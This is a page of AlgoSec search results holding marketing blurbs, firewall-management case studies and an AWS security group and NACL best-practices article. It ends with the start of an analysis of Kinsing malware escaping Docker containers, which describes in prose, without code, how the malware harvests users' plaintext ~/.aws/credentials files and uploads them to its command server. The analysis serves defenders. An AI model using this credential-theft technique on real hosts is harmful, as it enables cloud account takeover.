top of page

Search results

675 results found with an empty search

  • Journey to the Cloud | AlgoSec

    Learn the basics of managing multiple workloads in the cloud and how to create a successful enterprise level security management program Webinars Journey to the Cloud Learn to speed up application delivery across a hybrid cloud environment while maintaining a high level of security Efficient cloud management helps simplify today’s complex network environment, allowing you to secure application connectivity anywhere. But it can be hard to achieve sufficient visibility when your data is dispersed across numerous public clouds, private clouds, and on-premises devices. Today it is easier than ever to speed up application delivery across a hybrid cloud environment while maintaining a high level of security. In this webinar, we’ll discuss: – The basics of managing multiple workloads in the cloud – How to create a successful enterprise-level security management program – The structure of effective hybrid cloud management July 5, 2022 Stephen Owen Esure Group Omer Ganot Product Manager Relevant resources Cloud atlas: how to accelerate application migrations to the cloud Keep Reading A Pragmatic Approach to Network Security Across Your Hybrid Cloud Environment Keep Reading 6 best practices to stay secure in the hybrid cloud Read Document Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • Algosec Cloud Enterprise (ACE) - AlgoSec

    Algosec Cloud Enterprise (ACE) Case Study Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • Firewall Management 201 | algosec

    Security Policy Management with Professor Wool Firewall Management 201 Firewall Management with Professor Wool is a whiteboard-style series of lessons that examine the challenges of and provide technical tips for managing security policies in evolving enterprise networks and data centers. Lesson 1 In this lesson, Professor Wool discusses his research on different firewall misconfigurations and provides tips for preventing the most common risks. Examining the Most Common Firewall Misconfigurations Watch Lesson 2 In this lesson, Professor Wool examines the challenges of managing firewall change requests and provides tips on how to automate the entire workflow. Automating the Firewall Change Control Process Watch Lesson 3 In this lesson, Professor Wool offers some recommendations for simplifying firewall management overhead by defining and enforcing object naming conventions. Using Object Naming Conventions to Reduce Firewall Management Overhead Watch Lesson 4 In this lesson, Professor Wool examines some tips for including firewall rule recertification as part of your change management process, including questions you should be asking and be able to answer as well as guidance on how to effectively recertify firewall rules Tips for Firewall Rule Recertification Watch Lesson 5 In this lesson, Professor Wool examines how virtualization, outsourcing of data centers, worker mobility and the consumerization of IT have all played a role in dissolving the network perimeter and what you can do to regain control. Managing Firewall Policies in a Disappearing Network Perimeter Watch Lesson 6 In this lesson, Professor Wool examines some of the challenges when it comes to managing routers and access control lists (ACLs) and provides recommendations for including routers as part of your overall security policy with tips on change management, auditing and ACL optimization. Analyzing Routers as Part of Your Security Policy Watch Lesson 7 In this lesson, Professor Wool examines the complex challenges of accurately simulating network routing, specifically drilling into three options for extracting the routing information from your network: SNMP, SSH and HSRP or VRPP. Examining the Challenges of Accurately Simulating Network Routing Watch Lesson 8 In this lesson, Professor Wool examines the complex challenges of accurately simulating network routing, specifically drilling into three options for extracting the routing information from your network: SNMP, SSH and HSRP or VRPP. NAT Considerations When Managing Your Security Policy Watch Lesson 9 In this lesson, Professor Wool explains how you can create templates - using network objects - for different types of services and network access which are reused by many different servers in your data center. Using this technique will save you from writing new firewall rules each time you provision or change a server, reduce errors, and allow you to provision and expand your server estate more quickly. How to Structure Network Objects to Plan for Future Policy Growth Watch Lesson 10 In this lesson, Professor Wool examines the challenges of migrating business applications and physical data centers to a private cloud and offers tips to conduct these migrations without the risk of outages. Tips to Simplify Migrations to a Virtual Data Center Watch Lesson 11 In this lesson, Professor Wool provides the example of a virtualized private cloud which uses hypervisor technology to connect to the outside world via a firewall. If all worksloads within the private cloud share the same security requirements, this set up is adequate. But what happens if you want to run workloads with different security requirements within the cloud? Professor Wool explains the different options for filtering traffic within a private cloud, and discusses the challenges and solutions for managing them. Tips for Filtering Traffic within a Private Cloud Watch Lesson 12 In this lesson Professor Wool discusses ways to ensure that your security policy on your primary site and on your disaster recovery (DR) site are always sync. He presents multiple scenarios: where the DR and primary site use the exact same firewalls, where different vendor solutions or different models are used on the DR site, and where the IP address is or is not the same on the two sites. Managing Your Security Policy for Disaster Recovery Watch Lesson 13 In this lesson, Professor Wool highlights the challenges, benefits and trade-offs of utilizing zero-touch automation for security policy change management. He explains how, using conditional logic, its possible to significantly speed up security policy change management while maintaining control and ensuring accuracy throughout the process. Zero-Touch Change Management with Checks and Balances Watch Lesson 14 Many organizations have different types of firewalls from multiple vendors, which typically means there is no single source for naming and managing network objects. This ends up creating duplication, confusion, mistakes and network connectivity problems especially when a new change request is generated and you need to know which network object to refer to. In this lesson Profession Wool provides tips and best practices for how to synchronize network objects in a multi-vendor environment for both legacy scenarios, and greenfield scenarios. Synchronized Object Management in a Multi-Vendor Environment Watch Lesson 15 Many organizations have both a firewall management system as well as a CMDB, yet these systems do not communicate with each other and their data is not synchronized. This becomes a problem when making security policy change requests, and typically someone needs to manually translate the names used by in the firewall management system to the name in the CMDB, which is a slow and error-prone process, in order for the change request to work. In this lesson Professor Wool provides tips on how to use a network security policy management to coordinate between the two system, match the object names, and then automatically populate the change management process with the correct names and definitions. How to Synchronize Object Management with a CMDB Watch Lesson 16 Some companies use tools to automatically convert firewall rules from an old firewall, due to be retired, to a new firewall. In this lesson, Professor Wool explains why this process can be risky and provides some specific technical examples. He then presents a more realistic way to manage the firewall rule migration process that involves stages and checks and balances to ensure a smooth, secure transition to the new firewall that maintains secure connectivity. How to Take Control of a Firewall Migration Project Watch Lesson 17 PCI-DSS 3.2 regulation requirement 6.1 mandates that organizations establish a process for identifying security vulnerabilities on the servers that are within the scope of PCI. In this new lesson, Professor Wool explains how to address this requirement by presenting vulnerability data by both the servers and the by business processes that rely on each server. He discusses why this method is important and how it allows companies to achieve compliance while ensuring ongoing business operations. PCI – Linking Vulnerabilities to Business Applications Watch Lesson 18 Collaboration tools such as Slack provide a convenient way to have group discussions and complete collaborative business tasks. Now, these automated chatbots can be used for answering questions and handling tasks for development, IT and infosecurity teams. For example, enterprises can use chatbots to automate information-sharing across silos, such as between IT and application owners. So rather than having to call somebody and ask them “Is that system up? What happened to my security change request?” and so on, tracking helpdesk issues and the status of help requests can become much more accessible and responsive. Chatbots also make access to siloed resources more democratic and more widely available across the organization (subject, of course to the necessary access rights). In this video, Prof. Wool discusses how automated chatbots can be used to help a wide range of users for their security policy management tasks – thereby improving service to stakeholders and helping to accelerate security policy change processes across the enterprise. Sharing Network Security Information with the Wider IT Community With Team Collaboration Tools Watch Have a Question for Professor Wool? Ask him now Choose a better way to manage your network Choose a better way to manage your network Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • Palo Alto and AlgoSec Joint Solution Brief - AlgoSec

    Palo Alto and AlgoSec Joint Solution Brief Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • Life Insurance | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Leading Life Insurance Company Ensures Security and Compliance Organization Life Insurance Industry Financial Services Headquarters Texas, USA Download case study Share Customer
success stories "AlgoSec worked right out of the box. We got started quickly and never looked back.” A leading insurance provider of life, disability and other benefits for individuals increases efficiency and ensures continuous compliance on their networks. Background This life insurance company provides insurance and wealth-management products and services to millions of Americans. The company employs thousands of people and maintains a network of several thousand financial representatives. They offer a wide range of insurance products and services that include life insurance, disability income insurance, annuities, investments, dental and vision. Challenges For decades, the company operated a large and growing data center in Bethlehem, PA which they recently transferred to Dallas, TX. During and since the transfer, the company has been replacing much of its multi-vendor network infrastructure, consolidating on Cisco Firepower technology, but still maintaining vestiges of other routers, firewalls and network equipment. At the new data center, the company’s IT staff maintains more than 100 firewalls that host some 10,000 rules. The company’s network security engineer described the considerable pressure on the security staff: “Change requests are frequent, 25-30 per week, demanding considerable time and effort by the security team.” Due to the presence of firewalls from multiple vendors, change requests were analyzed manually and pushed to devices with great care so as not to interrupt the operation of a rapidly growing body of applications. “The change–request process was tedious and very time consuming,” declared the engineer. “as was the pressure to maintain a strong compliance posture at all times.” The company is subject to a litany of demanding insurance-industry regulations that concern the care of personal information and processes. Managing risk is critical to the success of the business and being able to ascertain compliance with regulations is always vital. Solution The security team turned to AlgoSec to help them manage network security policy across the large data center that includes firewalls from multiple vendors. After a careful review, the security team acquired AlgoSec’s Firewall Analyzer to speed up the process of firewall change management as well as to continuously quantify the degree of compliance and level of risk. Vendor-agnostic AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on–premise and cloud networks. It automates and simplifies security operations including troubleshooting, auditing and risk analysis. Firewall Analyzer optimizes the configuration of firewalls, routers, web proxies and related network infrastructure to ensure security and compliance. Results After a very short installation and learning period, the security staff became proficient at operating Firewall Analyzer’s helpful capabilities. Soon thereafter, staff members undertook AlgoSec certification courses to become experts in using the solution for firewall analysis. “AlgoSec worked right out of the box,” said the engineer. “We got started quickly and never looked back.” The AlgoSec solution has significantly improved processes, delivering significantly improved results for their security team: Reduced time to analyze and optimize firewall rules, automatically checking for shadow rules and discovering other rules eligible for consolidation or deletion. Continual optimization of firewall rules across their entire network estate. Increased efficiency of security staff, enabling them to keep up with the volume of change requests. Accelerated and more accurate change verification. Audit-readiness, generating scheduled and on-demand compliance reports. The security staff looks forward to implementing AlgoSec FireFlow (AFF), that will enable them to push changes automatically to their population of firewalls, eliminating errors and further reducing risk. With AFF, the staff will be able to respond to changing business requirements with increased speed and agility. They added: “We are also checking out AlgoSec’s new cloud-security solution since we are migrating a growing number of applications to AWS.” Schedule time with one of our experts

  • Energy Supplier | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Energy supplier keeps the lights on with automated network change management Organization Energy Supplier Industry Utilities & Energy Headquarters International Download case study Share Customer
success stories "AlgoSec has saved us a lot of time in managing our rule base.” Large energy supplier empowers internal stakeholders and streamlines network security policy change process Background The company is the provider of electricity and gas for their country. They are responsible for the planning, construction, operation, maintenance and global technical management of both these grids and associated infrastructures. The Challenge In order to provide power to millions of people, the company runs more than twenty IT and OT firewalls from multiple vendors that are hosted in multiple data centers throughout the country. Some of the challenges included: Lack of visibility over a complex architecture – With multiple networks, IT managers needed to know which network is behind which firewall and connect traffic flows to firewall rules. Change management processes were being managed by network diagrams created in Microsoft Visio and Microsoft Excel spreadsheets – tools that were not designed for network security policy management. Thousands of rules – Each firewall may have thousands of rules each. Many of these rules are unneeded and introduce unnecessary risk. Managing the maze of rules was time consuming and took time away from other strategic initiatives. Unnecessary requests – Business stakeholders were requesting status information about network traffic and making duplicate and unnecessary change requests for items covered by existing rules. The Solution The company was searching for a solution that provided: Visibility into their network topology, including traffic flows. Optimization of their firewall rules. Alerts before time-based rules expire. Automatic implementation of their rule base onto their firewall devices. They implemented AlgoSec Firewall Analyzer and AlgoSec FireFlow, as well as AlgoBot, AlgoSec’s ChatOps solution. AlgoSec Firewall Analyzer ensures security and compliance by providing visibility and analysis into complex network security policies. AlgoSec FireFlow improves security and saves security staffs’ time by automating the entire security policy change process, eliminating manual errors, and reducing risk. AlgoBot is an intelligent chatbot that handles network security policy management tasks. AlgoBot answers business user’s questions, submitted in plain English, and automatically assists with security policy change management processes – without requiring manual inputs or additional research. The Results Some of the ways the company benefitted from using AlgoSec include: Visibility and topology mapping – They are able to get a picture of their entire network and view traffic flows to each network device. Optimized firewall rules – They are able to adjust the placement of their rules, placing their most used rules higher in the rule base, improving performance, and also checking for unused objects or rules to clean up, removing unused rules, improving firewall performance. Improved communication and transparency for time-based rules – Before time-based rules expire (rule with an expiration date), the requester is automatically notified and asked if the rule should be extended or removed. Better, more refined rule requests – By first gathering information from AlgoBot, rule requests are better focused. Internal customers are able to check if rules are already in place before making requests, therefore avoiding requests that are already covered by existing rules. Empower internal stakeholders – Able to save the IT team’s time by empowering internal stakeholders to use AlgoBot to get the answers themselves to traffic queries. Met change implementation SLAs – By implementing their rules with AlgoSec, the company meets their internal SLAs for change implementation. Streamlined auditing processes – By documenting the changes they made in the firewalls, who made them, and when, their audit processes are streamlined. Zero-touch automation – Automatically implementing rules in multiple firewalls simultaneously ensures policy consistency across multiple devices, while preserving staff resources. This also eliminates the need to use the management consoles from individual vendors, saving time and reducing misconfigurations. Staff efficiencies – Hundreds of monthly change requests are able to be managed by a single staff member. He would not be able to do it without AlgoSec. The company switched from a competing solution because it was more user-friendly and provided greater visibility than the competing solution they were previously using. They are also impressed with AlgoSec’s scalability. “The initial setup is really easy. It has been running flawlessly since installation. Even upgrades are pretty straightforward and have never given us problems,” they noted. Schedule time with one of our experts

  • Energy Group | AlgoSec

    Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Global Energy Group Streamlines Change Requests Process Organization Energy Group Industry Utilities & Energy Headquarters International Download case study Share Customer
success stories "Now we can do a firewall change in around one hour. Before, it took five days or more with 20 engineers. Today, we do the same job, but much quicker, with 4 people - resulting in happier customers,” says the Security Service Delivery Manager. “One of the best things you win in the end, is the cost. With 500 changes on a firewall a month, that’s significant.” IT Integrator Gets Faster Implementation of Firewall Changes – Leading to Greater Efficiency and Lower Costs BACKGROUND The company is the IT integrator for a large energy group, which offers low-carbon energy and services. The group’s purpose is to act to accelerate the transition towards a carbon-neutral world, through reduced energy consumption and more environmentally friendly solutions, reconciling economic performance with a positive impact on people and the planet. The IT integrator of the group designs, implements and operates IT solutions for all its business units and provides applications and infrastructure services. It includes four “families” of services: Digital and IT Consulting, Digital Workplace, Cloud Infrastructures, and Network and Cybersecurity, and Agile business solutions. CHALLENGES This large group (with 170,000 employees) had a complex network with multiple elements in the firewall. With 240 firewall change requests and 500 changes a month, they needed an easier and faster way to manage these changes, ensuring their business applications functioned properly while maintaining their security posture. The main challenges were: Large network with lots of rules. Slow execution of change requests. Change requests were very labor intensive. SOLUTION With 500 monthly firewall changes, the customer was searching for a solution that provided: Faster implementation of firewall changes. Clear workflow and easier change management processes. Comprehensive firewall support. Visibility into their business applications and traffic flows. The client chose AlgoSec for its workflow solution, requiring a tool that would help the customer seamlessly submit the request and enable the engineer to implement the optimal changes to the firewall. They implemented the AlgoSec Security Policy Management Solution, made up of AlgoSec Firewall Analyzer, AlgoSec FireFlow, and AlgoSec AppViz and AppChange (formerly AlgoSec BusinessFlow). AlgoSec Firewall Analyzer ensures security and compliance by providing visibility and analysis into complex network security policies. AlgoSec FireFlow improves security and saves security staffs’ time by automating the entire security policy change process, eliminating manual errors, and reducing risk. AlgoSec AppViz provides critical security information regarding the firewalls and firewall rules supporting each connectivity flow by letting users discover, identify, and map business applications. AlgoSec AppChange empowers customers to make changes at the business application level, including application migrations, server deployment, and decommissioning projects. RESULTS “We do the job quicker, with less people. With 500 changes on a firewall a month, that’s significant. I recommend AlgoSec as it gives a quick solution for the request and analysis,” said the Security Service Delivery Manager. By using the AlgoSec Security Management Solution, the customer gained: Greater insight and oversight into their firewalls and other network devices. Identification of risky rules and other holes in their network security policy. Easier cleanup process due to greater visibility. 80% reduction in manpower. Faster implementation of policy changes – from five days to one hour. Schedule time with one of our experts

  • AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively

    Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure... AWS NACL best practices: How to combine security groups with network ACLs effectively Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/28/23 Published Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You’ll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute (EC2) instances and the rest of the Internet. You’ll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it the rest of your security framework. For example, your firewall rules impact the way Amazon Identity Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively , you must familiarize yourself with how AWS security tools work and what sets them apart. Everything you need to know about security groups vs NACLs AWS security groups explained: Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can’t delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. Each security group can only contain up to 60 rules, but you can set up to 2500 security groups per Region. You can associate many different security groups to a single instance, potentially combining hundreds of rules. These are all allow rules that allow traffic to flow according the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for linux SSH commands and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, VPC security groups automatically responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can’t use them to block a specific IP address from connecting with your EC2 instance. Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group. AWS NACLs explained: Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level. That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on data flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other. Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won’t work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet’s CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and AWS CloudWatch. You may need to set up specific inclusions for third-party APIs, as well. You can create these inclusions by specifying ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it’s different than the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules. Misconfigured NACLs deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities . How to configure and map NACL associations A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain. To find out which NACL is associated with a subnet: Open the Amazon VPC console . Select Subnets in the navigation pane. Select the subnet you want to inspect. The Network ACL tab will display the ID of the ACL associated with that network, and the rules it contains. To find out which subnets are associated with a NACL: Open the Amazon VPC console . Select Network ACLS in the navigation pane. Click over to the column entitled Associated With. Select a Network ACL from the list. Look for Subnet associations on the details pane and click on it. The pane will show you all subnets associated with the selected Network ACL. Now that you know how the difference between security groups and NACLs and you can map the associations between your subnets and NACLs, you’re ready to implement some security best practices that will help you strengthen and simplify your network architecture. 5 best practices for AWS NACL management Pay close attention to default NACLs, especially at the beginning Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL. This allows all traffic to flow into and out of the network. Going back and building a working security policy framework will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward. Implement a two-tiered system where NACLs and security groups complement one another Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL). Look out for ineffective, redundant, and misconfigured deny rules Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you’re likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you’ll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture. Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring. Limit outbound traffic to the required ports or port ranges When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though. This may introduce vulnerabilities into your security posture. It’s better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This establishes the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level. Test your security posture frequently and verify the results How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven’t left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn’t always mean actively running penetration tests with experienced red team consultants, although that’s a valuable way to ensure best-in-class security. It also means taking time to validate your rules by running small tests with an external device. Consider using AWS flow logs to trace the way your rules direct traffic and using that data to improve your work. How to diagnose security group rules and NACL rules with flow logs Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way. This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the Flow Log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console: Network interfaces VPCs Subnets You can use the ping command from an external device to test the way your instance’s security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies. First you’ll need to create a flow log in the AWS CLI. This is an example of a flow log query that captures all rejected traffic for a specified network interface. It delivers the flow logs to a CloudWatch log group with permissions specified in the IAM role: aws ec2 create-flow-logs \ –resource-type NetworkInterface \ –resource-ids eni-1235b8ca123456789 \ –traffic-type ALL \ –log-group-name my-flow-logs \ –deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you’ll get two records that look like this: 2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK 2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK To parse this data, you’ll need to familiarize yourself with flow log syntax. Default flow log records contain 14 arguments, although you can also expand custom queries to return more than double that number: Version tells you the version currently in use. Default flow logs requests use Version 2. Expanded custom requests may use Version 3 or 4. Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer. Interface-id shows the unique ID of the network interface for the traffic currently under inspection. Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. In the case of IPv4 addresses for network interfaces, it is always its private IPv4 address. Srcport is the source port for the traffic under inspection. Dstport is the destination port for the traffic under inspection. Protocol refers to the corresponding IANA traffic protocol number . Packets describes the number of packets transferred. Bytes describes the number of bytes transferred. Start shows the start time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet. End shows the time when the last data packet was received. This can be up to one minutes after the network interface transmitted or received the data packet. Action describes what happened to the traffic under inspection: ACCEPT means that traffic was allowed to pass. REJECT means the traffic was blocked, typically by security groups or NACLs. Log-status confirms the status of the flow log: OK means data is logging normally. NODATA means no network traffic to or from the network interface was detected during the specified interval. SKIPDATA means some flow log records are missing, usually due to internal capacity restraints or other errors. Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface’s private IP address, which is 172.31.16.139. The security group’s inbound rules allowed the ICMP traffic to travel through, producing an ACCEPT record. However, the NACL did not let the ping response go through, because it is stateless. This generated the REJECT record that followed immediately after. If you configure your NACL to permit output ICMP traffic and run this test again, the second flow log record will change to ACCEPT. azon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It’s easy to see why: AWS offers high capacity, scalable and cost-effective storage, and a flexible, shared responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does throw up some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn’t just secure today, but will continue delivering robust, easily managed security in the future? The basics: security groups AWS offers virtual firewalls to organizations, for filtering traffic that crosses their cloud network segments. The AWS firewalls are managed using a concept called Security Groups. These are the policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate. AWS Security Groups are not identical to traditional firewalls, and they have some unique characteristics and functionality that you should be aware of, and we’ve discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups , but the crucial points to be aware of are as follows. First, security groups do not deny traffic – that is, all the rules in security groups are positive, and allow traffic. Second, while security group rules can be set to specify a traffic source, or a destination, they cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) as the instance to which the group is applied. Finally, single security groups can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs. Adding Network ACLs into the mix To further enhance and enrich its security filtering capabilities AWS also offers a feature called Network Access Control Lists (NACLs). Like security groups, each NACL is a list of rules, but there are two important differences between NACLs and security groups. The first difference is that NACLs are not directly tied to instances, but are tied with the subnet within your AWS virtual private cloud that contains the relevant instance. This means that the rules in a NACL apply to all of the instances within the subnet, in addition to all the rules from the security groups. So a specific instance inherits all the rules from the security groups associated with it, plus the rules associated with a NACL which is optionally associated with a subnet containing that instance. As a result NACLs have a broader reach, and affect more instances than a security group does. The second difference is that NACLs can be written to include an explicit action, so you can write ‘deny’ rules – for example to block traffic from a particular set of IP addresses which are known to be compromised. The ability to write ‘deny’ actions is a crucial part of NACL functionality. It’s all about the order As a consequence, when you have the ability to write both ‘allow’ rules and ‘deny’ rules, the order of the rules now becomes important. If you switch the order of the rules between a ‘deny’ and ‘allow’ rule, then you’re potentially changing your filtering policy quite dramatically. To manage this, AWS uses the concept of a ‘rule number’ within each NACL. By specifying the rule number, you can identify the correct order of the rules for your needs. You can choose which traffic you deny at the outset, and which you then actively allow. As such, with NACLs you can manage security tasks in a way that you cannot do with security groups alone. However, we did point out earlier that an instance inherits security rules from both the security groups, and from the NACLs – so how do these interact? The order by which rules are evaluated is this; For inbound traffic, AWS’s infrastructure first assesses the NACL rules. If traffic gets through the NACL, then all the security groups that are associated with that specific instance are evaluated, and the order in which this happens within and among the security groups is unimportant because they are all ‘allow’ rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then finally against the NACL that is associated with the relevant subnet. You can see me explain this topic in person in my new whiteboard video: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers

    We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an... Cloud Security Kinsing Punk: An Epic Escape From Docker Containers Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/22/20 Published We all remember how a decade ago, Windows password trojans were harvesting credentials that some email or FTP clients kept on disk in an unencrypted form. Network-aware worms were brute-forcing the credentials of weakly-restricted shares to propagate across networks. Some of them were piggy-backing on Windows Task Scheduler to activate remote payloads. Today, it’s déjà vu all over again. Only in the world of Linux. As reported earlier this week by Cado Security, a new fork of Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we wanted to break down some of its components and get a closer look into its modus operandi. As it turned out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let’s start from its simplest trick — the credentials grabber. AWS Credentials Grabber If you are using cloud services, chances are you may have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and configure its type of access to be Programmatic access, the console will provide you with Access key ID and Secret access key of the newly created IAM user. You will then use those credentials to configure the AWS Command Line Interface ( CLI ) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same by using AWS CLI programmatically. There is one little caveat, though. AWS CLI stores your credentials in a clear text file called ~/.aws/credentials . The documentation clearly explains that: The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory. That means, your cloud infrastructure is now as secure as your local computer. It was a matter of time for the bad guys to notice such low-hanging fruit, and use it for their profit. As a result, these files are harvested for all users on the compromised host and uploaded to the C2 